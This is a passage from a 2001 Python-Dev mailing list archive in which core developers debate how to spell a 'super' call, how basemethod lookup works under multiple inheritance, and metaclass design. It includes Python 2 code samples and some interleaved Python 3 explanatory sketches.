Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritence, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritance tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritance tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrence calling the basemethod() API. Hmm, still not clear enough... better let Tim jump in here (we've had a discussion about basemethod() some months or years ago). Tim ?
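The definition above depends on the "left-right, depth first" lookup strategy. A diamond, where one base is reachable along two branches, is a quick way to see how much the answer depends on the lookup order chosen. The Python 3 sketch below compares the classic depth-first order with the C3 order that modern Python exposes as `__mro__`. `classic_order`, `first_definer` and the four diamond classes are hypothetical names for illustration only.

```python
def classic_order(cls):
    """Depth-first, left-to-right search order of classic classes.

    A class reachable along several branches is kept at its first position;
    `object` is skipped to mimic classic (pre-2.2) classes.
    """
    order = []

    def visit(klass):
        if klass is object or klass in order:
            return
        order.append(klass)
        for base in klass.__bases__:
            visit(base)

    visit(cls)
    return order


def first_definer(order, name):
    """Return the first class in `order` whose own __dict__ defines `name`."""
    for klass in order:
        if name in klass.__dict__:
            return klass
    return None


class Root:
    def hello(self):
        return "Root.hello"


class Left(Root):
    pass


class Right(Root):
    def hello(self):
        return "Right.hello"


class Bottom(Left, Right):
    pass
```

Classic depth-first search visits `Root` (through `Left`) before `Right`, so it would find `Root.hello`. C3 places `Root` after both of its subclasses and finds `Right.hello`. A "basemethod" defined by either order is well-defined, but the two orders give different answers.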
Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritance (e.g. the same base class may appear in different branches of the inheritance tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 16:05:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...)
> > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:04:29 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools):

    import sys, types

    _basemethod_cache = {}

    def basemethod(object,method=None,
                   cache=_basemethod_cache,InstanceType=types.InstanceType,
                   ClassType=types.ClassType,None=None):

        """ Return the unbound method that is defined *after* method in the
            inheritance order of object with the same name as method
            (usually called base method or overridden method).

            object can be an instance, class or bound method. method,
            if given, may be a bound or unbound method. If it is not
            given, object must be a bound method.

            Note: Unbound methods must be called with an instance as first
            argument.

            The function uses a cache to speed up processing. Changes done
            to the class structure after the first hit will not be noticed
            by the function.

            XXX Rewrite in C to increase performance.

        """
        if method is None:
            method = object
            object = method.im_self
        defclass = method.im_class
        name = method.__name__
        if type(object) is InstanceType:
            objclass = object.__class__
        elif type(object) is ClassType:
            objclass = object
        else:
            objclass = object.im_class

        # Check cache
        cacheentry = (defclass, name)
        basemethod = cache.get(cacheentry, None)
        if basemethod is not None:
            if not issubclass(objclass, basemethod.im_class):
                if __debug__:
                    sys.stderr.write(
                        'basemethod(%s, %s): cached version (%s) mismatch: '
                        '%s !-> %s\n' %
                        (object, method, basemethod,
                         objclass, basemethod.im_class))
            else:
                return basemethod

        # Find defining class
        path = [objclass]
        while 1:
            if not path:
                raise AttributeError,method
            c = path[0]
            del path[0]
            if c.__bases__:
                # Prepend bases of the class
                path[0:0] = list(c.__bases__)
            if c is defclass:
                # Found (first occurrence of) defining class in inheritance
                # graph
                break

        # Scan rest of path for the next occurrence of a method with the
        # same name
        while 1:
            if not path:
                raise AttributeError,name
            c = path[0]
            basemethod = getattr(c, name, None)
            if basemethod is not None:
                # Found; store in cache and return
                cache[cacheentry] = basemethod
                return basemethod
            del path[0]
        raise AttributeError,'method %s' % name

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 15:06:39 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
<200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido@digicool.com Wed May 2 16:11:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. 
This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self), keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritance tree using the standard Python lookup > strategy (left-to-right, depth-first) when continuing the lookup search > at the node in the inheritance tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrence calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritance > (e.g. the same base class may appear in different branches of the > inheritance tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may mean that my ugly rule is still needed.
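Python 3 ended up offering both spellings discussed here: `super()` continues along the instance's linearized MRO, while naming a base explicitly (`C.greet(self)`) plays the role of C++'s `C::greet()`. The classes below are hypothetical and only illustrate the difference in a diamond. Note that the `super()` call inside `C.greet` still follows the instance's MRO even when `C.greet` is chosen explicitly.

```python
class Base:
    def greet(self):
        return ["Base"]

class B(Base):
    def greet(self):
        return ["B"] + super().greet()

class C(Base):
    def greet(self):
        return ["C"] + super().greet()

class A(B, C):
    def greet_via_super(self):
        # Follows A's linearized MRO: A, B, C, Base, object.
        return super().greet()

    def greet_only_c(self):
        # Names one specific base, the analogue of C::greet() in C++.
        return C.greet(self)

print([k.__name__ for k in A.__mro__])  # ['A', 'B', 'C', 'Base', 'object']
print(A().greet_via_super())            # ['B', 'C', 'Base']
print(A().greet_only_c())               # ['C', 'Base']
```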
AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 16:19:07 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this: class B: def foo(self): print "B.foo" class C(B): def foo(self): print "C.foo" B.foo(self) print basemethod(self.foo) # Expect this to be B.foo class D(C): def foo(self): print "D.foo" C.foo(self) d = D() d.foo() but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 16:23:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes). 
> > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:29:20 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. 
To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo). Note that the intent here is to be able to call basemethods even in case the defining class is only a mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Wed May 2 15:15:58 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ?
in which case super is something like: import new class super: def __init__(self, instance): self.instance = instance def __getattr__(self, name): for klass in self.instance.__class__.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) (I'm even more confused than my pythonware.com colleague) Cheers /F From Donald Beaudry Wed May 2 15:41:14 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic than I am used to (coming from Python at least). Currently, we spell 'super' like this: class foo(bar): def __repr__(self): return bar.__repr__(self) # that's super! I like the explicit nature of it. As Guido points out, however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super?
class foo(bar): def __repr__(self): return bar._.__repr__(self) # now that's really super! or, for those who like the "keyword": class foo(bar): def __repr__(self): super = bar._ return super.__repr__(self) The trick here is in the implementation of getattr on the '_'. It returns a proxy object for the class. When attributes are accessed through it, a different search path is taken. This path is the same path that would be taken by instance attribute lookup. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller@ion-tof.com Wed May 2 15:49:02 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ?
in which case > super is something like: > > import new > > class super: > def __init__(self, instance): > self.instance = instance > def __getattr__(self, name): > for klass in self.instance.__class__.__bases__: > member = getattr(klass, name, None) > if member: > if callable(member): > return new.instancemethod(member, self.instance, klass) > return member > raise AttributeError(name) > No, it's not the same. Consider: class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self).test() class Z(Y): pass X().test() print Y().test() print Z().test() print This prints: test X test Y test X test Y test Y (more test Y lines deleted) Runtime error: maximum recursion depth exceeded This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller@ion-tof.com Wed May 2 15:53:17 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly: import new class super: def __init__(self, instance, klass): self.instance = instance self.klass = klass def __getattr__(self, name): for klass in (self.klass,) + self.klass.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) class X: def test(self): print "test X" class Y(X): def test(self): print 
"test Y" super(self, X).test() class Z(Y): pass X().test() print Y().test() print Z().test() print Thomas From Donald Beaudry Wed May 2 16:31:45 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that the search starts one level too high. That is, in: class foo(b1, b2): def __repr__(self): super = b1._ #this one super = b2._ #or this one? return super.__repr__(self) we don't know which base class to choose as the starting point for the search. This problem already exists. Now, if we want to avoid it, this: class foo(b1, b2): def __repr__(self): super = foo.__super__ return super.__repr__(self) comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...Will hack for sushi...
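Donald's `foo.__super__` and Guido's `self.__super` spellings both come down to storing, per class, an object that already knows which class the search continues from. Thomas's recursion example shows why `self.__class__` alone cannot supply that. Below is a minimal Python 3 sketch of the idea. It uses a hypothetical `autosuper` metaclass that stores an unbound `super(cls)` under the name-mangled attribute `_ClassName__super`. Unbound super objects are descriptors, so fetching that attribute through an instance yields `super(cls, instance)`.

```python
class autosuper(type):
    """Hypothetical metaclass giving every class a private __super attribute."""

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Inside class X, "self.__super" is name-mangled to "self._X__super"
        # (the mangler strips leading underscores from the class name).
        # super(cls) is an *unbound* super object; it is a descriptor, so
        # reading it through an instance produces super(cls, instance).
        setattr(cls, "_%s__super" % name.lstrip("_"), super(cls))


class A(metaclass=autosuper):
    def meth(self):
        return "A"

class B(A):
    def meth(self):
        return "B" + self.__super.meth()

class C(A):
    def meth(self):
        return "C" + self.__super.meth()

class D(C, B):
    def meth(self):
        # Each class names only itself (implicitly, via mangling),
        # so the chain follows D's MRO: D, C, B, A, object.
        return "D" + self.__super.meth()

print(D().meth())  # DCBA
```

Each method only ever names its own class, so adding a subclass such as Thomas's `Z(Y)` does not cause the recursion he demonstrates.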
From Donald Beaudry Wed May 2 16:37:39 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You can't ask the instance for it, since its value is different depending on the class in which it is needed. Just as: class foo(bar): def __repr__(self): return self.__class__.__repr__(self) would get you into an infinite loop, while: class foo(bar): def __repr__(self): return bar.__repr__(self) won't. Now, don't go thinking that class foo(bar): def __repr__(self): return self.__class__.__bases__[0].__repr__(self) will do you any good either ;) Because it won't! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From guido@digicool.com Wed May 2 18:02:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm@hypernet.com Wed May 2 17:01:20 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you want this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf. the types-sig brouhaha of a couple of years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of Smalltalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.)
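One concrete illustration relevant to the "pragmatic benefits" question is the "guarded" attribute Guido mentions earlier in the thread: a get/set pair that lives in the class dict instead of being hand-coded in `__getattr__`/`__setattr__`. The sketch below uses Python 3's data-descriptor protocol (`__get__`, `__set__`, and `__set_name__`, the last of which needs Python 3.6 or later). `Guarded` and `Account` are hypothetical names.

```python
class Guarded:
    """Hypothetical data descriptor: a validated get/set pair in the class dict."""

    def __init__(self, check):
        self.check = check

    def __set_name__(self, owner, name):
        # Keep the real value under a private key in the instance dict.
        self.key = "_guarded_" + name

    def __get__(self, instance, owner):
        if instance is None:
            return self  # accessed on the class itself, e.g. Account.balance
        try:
            return instance.__dict__[self.key]
        except KeyError:
            raise AttributeError(self.key) from None

    def __set__(self, instance, value):
        if not self.check(value):
            raise ValueError("rejected value %r" % (value,))
        instance.__dict__[self.key] = value


class Account:
    # No __getattr__/__setattr__ override: the class dict entry does the work.
    balance = Guarded(lambda v: v >= 0)

    def __init__(self, balance):
        self.balance = balance  # goes through Guarded.__set__


acct = Account(10)
acct.balance = 5
try:
    acct.balance = -1
except ValueError as exc:
    print(exc)  # rejected value -1
print(acct.balance)  # 5
print(type(Account.__dict__["balance"]).__name__)  # Guarded
```

As in Guido's description, `Account.__dict__['balance']` holds the descriptor, and it alone decides how `acct.balance` is read and written.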
start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik@effbot.org Wed May 2 16:47:08 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects 